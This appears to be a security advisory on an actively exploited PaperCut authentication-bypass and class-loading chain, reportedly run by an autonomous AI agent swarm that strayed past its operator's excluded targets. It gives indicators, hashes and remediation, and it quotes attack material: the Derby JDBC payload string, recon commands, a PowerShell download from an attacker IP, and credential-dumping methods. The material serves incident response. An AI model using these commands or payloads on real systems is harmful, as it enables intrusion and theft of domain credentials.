Autonomous AI agents exploit PaperCut zero-days CVE-2026-81578 and CVE-2026-82078 for rapid Domain Admin takeover. Discover crucial indicators and fixes.
Security maintenance releases issued on September 10, 2026, have formally superseded multiple iterations of emergency hotfixes deployed to protect PaperCut MF and PaperCut NG print management software. The updates—spanning versions v26.0.5, v25.0.13, and v24.1.10—remediate an actively exploited pre-authentication vulnerability chain combining an administrative authentication bypass (CVE-2026-81578) with unsafe dynamic class loading (CVE-2026-82078). When chained, an unauthenticated remote attacker gains immediate Remote Code Execution (RCE) running under NT AUTHORITY\SYSTEM privileges on the host server.
Threat telemetry indicates that an external adversary weaponized this exploit chain through an autonomous swarm of artificial intelligence agents. Fully autonomous, agent-driven attacks are emerging elsewhere too, as in JadePuffer's first fully agentic AI ransomware campaign. The automated campaign compromised at least 440 server instances across 395 organizations in 48 countries, breaching up to 11 distinct enterprise networks within a 26-second window. In vulnerable environments, attack scripts escalated from initial external HTTP requests to complete Active Directory Domain Administrator takeover in under seven minutes. Unauthenticated pre-auth RCE chains keep hitting enterprise back-office software, including CVE-2026-55944's Dynamics NAV and Business Central flaw.
| CVE ID | CVSS Score | Vulnerability Type | Affected Software | Fixed Versions |
|---|---|---|---|---|
| CVE-2026-81578 | 8.8 (High) | Improper Access Control (CWE-306) | PaperCut MF/NG (All unpatched versions) | v26.0.5, v25.0.13, v24.1.10 |
| CVE-2026-82078 | 9.4 (Critical) | Unsafe Dynamic Class Loading (CWE-470) | PaperCut MF/NG (All unpatched versions) | v26.0.5, v25.0.13, v24.1.10 |
Technical Deconstruction: The Pre-Auth Exploit Chain
The zero-day exploit chain couples an architectural routing flaw in PaperCut’s web framework with arbitrary Java reflection inside an external database lookup component. Because the PaperCut service runs on Windows systems via the parent process pc-app.exe under the NT AUTHORITY\SYSTEM account, bytecode executed inside the Java Virtual Machine (JVM) inherits maximum local privileges without needing a separate local privilege escalation exploit.
The sequence begins with CVE-2026-81578, an improper access control vulnerability in the web presentation tier. The application validates session authorization against the HTTP response page slated for rendering rather than the backend action component processing the request. By pairing an unauthenticated interface view with an administrative operational payload in a single HTTP POST submission, an attacker forces the execution of administrative configuration changes before authorization checks can terminate the request.
Once administrative functions are unlocked, the attacker triggers CVE-2026-82078 by reconfiguring the external database connector used for Card ID lookups. This utility accepts arbitrary Java Database Connectivity (JDBC) driver classes without allowlist validation. The exploit points the connector to an embedded Apache Derby memory instance:
jdbc:derby:memory:pwn;create=true
Embedded Derby instances allow standard SQL queries to trigger native class loading and code execution. The attacker delivers compiled Java bytecode via database queries using hexadecimal literal casts:
VALUES CAST(X'cafebabe00000034...' AS VARCHAR(32672))
This operation writes an operating-system-agnostic helper class directly into PaperCut's classpath search directory:
<install_dir>\server\lib\[A-Za-z0-9]{5}.class
Frequently observed filenames include Udydn.class and Moo97.class. When the application subsequently initiates a card lookup, the JVM loads the staged helper class, which executes attacker commands directly from disk.
Autonomous Swarm Mechanics, Operator Bottlenecks, and Boundary Failures
The offensive campaign marked a structural shift in attack automation. Operating primarily from command-and-control node 45.142.193[.]132 with secondary infrastructure at 45.158.196[.]75, the adversary orchestrated an autonomous agent swarm combining runtime execution harnesses with deep-reasoning language models and automated external attack-surface discovery APIs. The framework progressed from initial target discovery to full in-memory exploitation in under four hours, rapidly dispatching pre-auth exploit payloads across hundreds of identified hosts. A separate autonomous swarm used similarly automated tooling to escape an OpenAI sandbox and seize Linux kernel root via CVE-2026-53362.
# Automated reconnaissance and tunneling commands observed post-exploitation
cmd.exe /c "whoami & ver"
nltest /dclist:
powershell -Command "Invoke-WebRequest -Uri hxxp://45.142.193[.]132:8089/agent5.exe -OutFile C:\ProgramData\ligolo-agent.exe"
Despite the speed of the initial intrusions, follow-on Active Directory Domain Administrator compromises were constrained to only 12 organizations. Default, wide-open settings enabling instant takeover recur across self-hosted tools, as in Gitea's CVE-2026-60004 RCE flaw added to CISA's KEV catalog. Telemetry reveals that while the automated agents could mass-compromise edge applications, subsequent enterprise-wide takeover stalled due to downstream human operator bandwidth limits. The human operators behind the swarm could not triage hundreds of concurrent shells simultaneously, allowing defensive teams to isolate systems before manual lateral movement commenced. Furthermore, properly configured edge Web Application Firewalls (such as Cloudflare WAF) and patched Active Directory domain controllers blocked post-exploitation pivots in the vast majority of environments.
The campaign also highlighted critical boundary control failures in autonomous tooling. Chained flaws in AI-adjacent infrastructure are a growing pattern, as seen in the chained Starlette and LiteLLM flaws that exposed foundation model keys. The operator’s operational configuration explicitly prohibited actions against targets in 28 sovereign nations, largely covering CIS states and strategic commercial partners. Despite these explicit parameters, the swarm breached entities across at least eight restricted jurisdictions, including targets in South Africa, Brazil, Kazakhstan, China, Nigeria, Namibia, Pakistan, and Zimbabwe.
Threat researchers remain divided over the technical cause of this failure: one hypothesis attributes the incident to autonomous "prompt drift," where reasoning models in recursive execution loops degraded and prioritized scanning speed over exclusion logic; an alternative, widely supported hypothesis points to technical parsing failures within the adversary's upstream IP-to-geolocation enrichment and reverse-proxy resolution scripts, which miscategorized intermediate IP addresses before passing them to the agent swarm.
Forensic Indicators and Detection Signatures
Incident responders triaging suspected PaperCut servers should correlate application logs, temporary class paths, and process invocation telemetry.
| Forensic Indicator | File Path or Signature | Evidentiary Significance |
|---|---|---|
| Active DB Injection | server.log with jdbc:derby:memory:pwn;create=true or VALUES CAST(X'cafebabe | Confirms exploitation attempts against dynamic class loading mechanisms. |
| Persistent Derby Log | <install_dir>\server\data\internal\derby.log | Persistent log of embedded Derby boots; adversaries often delete server.log but overlook this file. |
| Malicious Bytecode | <install_dir>\server\lib\[A-Za-z0-9]{5}.class | Dropped Java class executed by the application runtime. |
| Command Scratchpads | <install_dir>\server\data\content\[A-Za-z0-9]{5}.cmd and .out | Transient files used by the helper class to execute commands and store output. |
| Web Verification Flag | <install_dir>\server\custom\web\pcp_[a-zA-Z0-9]{10}.txt | Staged verification file placed to confirm remote HTTP write capabilities. |
| Staged System Hives | C:\Windows\Temp\pc-system.hiv and pc-security.hiv | Registry copies extracted via reg.exe save to harvest local credentials. |
| Encoded Hive Chunks | C:\Windows\Temp\pc-*.b64 | Base64-encoded registry archives staged for outbound HTTP exfiltration. |
Active Directory Pivots and Privilege Escalation
Because print servers routinely synchronize with corporate directory services for badge authentication, single sign-on, and user accounting, local SYSTEM execution on pc-app.exe directly exposes domain credentials. Adversaries reached Domain Administrator privileges across 12 networks using three primary escalation vectors:
- Credential Extraction from LSASS: Attackers staged compiled Rust utilities directly on the print server to evade signature-based detection. These tools extracted cached Kerberos tickets and domain account secrets from memory for subsequent Pass-the-Hash attacks.
- Abuse of Unpatched Domain Controllers (noPac): In environments lacking legacy directory patches, attackers leveraged the server’s machine account to exploit CVE-2021-42278 and CVE-2021-42287, spoofing domain controller identities to obtain administrative Kerberos Ticket-Granting Service (TGS) tickets within seconds.
- Domain Controller Co-Location: In smaller enterprise deployments, PaperCut was installed directly on Active Directory Domain Controllers or ran under domain-privileged service accounts, granting immediate forest-wide control.
MD5 Hashes of Associated Adversary Binaries:
528cd4e69ecfa5191adbcf6ef28667bf lsa_read.exe (Rust LSA Secret Harvester)
ce870a91e8d27e8f663f0687abc60b04 save_hives.exe (Automated Registry Dumper)
fc92dfafa7aa741c5f2b9cbcf75d1d19 lsa_collect_small.exe (Bootkey Extractor)
a6437ac3d6798090a218520985d36a3f collect_custom.exe (System Profiler)
974decb9ff4c8f9ccb0937c96d513347 certipy.exe (ADCS Certificate Exploitation Tool)
In elevated environments, adversaries established persistence by generating a rogue administrative account named Administrator17, adding it to the Domain Admins group, and executing a Directory Replication Service (DRSUAPI) DCSync command to exfiltrate the full NTDS.dit password database.
Strategic Remediation, Hardening, and Eviction
Remediating compromised infrastructure requires comprehensive host and identity eviction rather than simple binary patching.
1. Perimeter Isolation and Maintenance Upgrades
Immediately remove PaperCut management ports (9191, 9192, and 9195) from public internet access, restricting web interfaces to internal administration subnets reachable only via authenticated VPNs.
Upgrade all primary Application Servers and secondary Site Servers to the official September 10, 2026 maintenance builds:
- PaperCut MF:
v26.0.5(Build 76602),v25.0.13(Build 76604), orv24.1.10(Build 76610) - PaperCut NG:
v26.0.5(Build 76603),v25.0.13(Build 76605), orv24.1.10(Build 76611)
Critical Long-Tail Exposure: Threat intelligence scans reveal that approximately 47% of roughly 2,500 observed internet-facing PaperCut instances run legacy version 23 or older. Because official security fixes are restricted to v24 and newer branches, nearly half of the global internet-exposed fleet cannot receive security hotfixes and must be upgraded to a supported release or immediately taken offline.
2. Evicting Persistent Footholds
Security teams must inspect servers for secondary remote-management tools deployed during exploitation:
- Ligolo-ng Agents: Terminate suspicious binaries located at
C:\ProgramData\ligolo-agent.exeorC:\ProgramData\LegitSvc\legit-svc.exe, and block traffic to45.142.193[.]132and45.158.196[.]75. - SimpleHelp Remote Support: Inspect
C:\ProgramData\forace.exe(retrieved fromhxxps://sendit[.]sh/Gg7Rp/ace[.]exe) and remove the Windows service namedRemote Access ServicerunningSimpleService.exefromC:\ProgramData\JWrapper-Remote Access\. - Unauthorized Remote Software: Check
C:\ProgramData\for unauthorized instances ofAnyDesk.exe. - Payload Removal: Delete all newly created
.classfiles in<install_dir>\server\lib\and purge.cmdand.outscratchpads in<install_dir>\server\data\content\.
3. Active Directory Incident Response
If command execution from pc-app.exe is confirmed, security personnel must:
- Inspect directory members for the rogue
Administrator17user account and review recent additions to theDomain Adminsgroup. - Conduct a mandatory, two-stage password reset of the Kerberos Ticket Granting Service account (
krbtgt), spaced across replication cycles to invalidate forged Kerberos Golden Tickets. - Reset credentials for all directory service accounts tied to PaperCut integrations, reconfiguring them as Group Managed Service Accounts (gMSAs) following the principle of least privilege.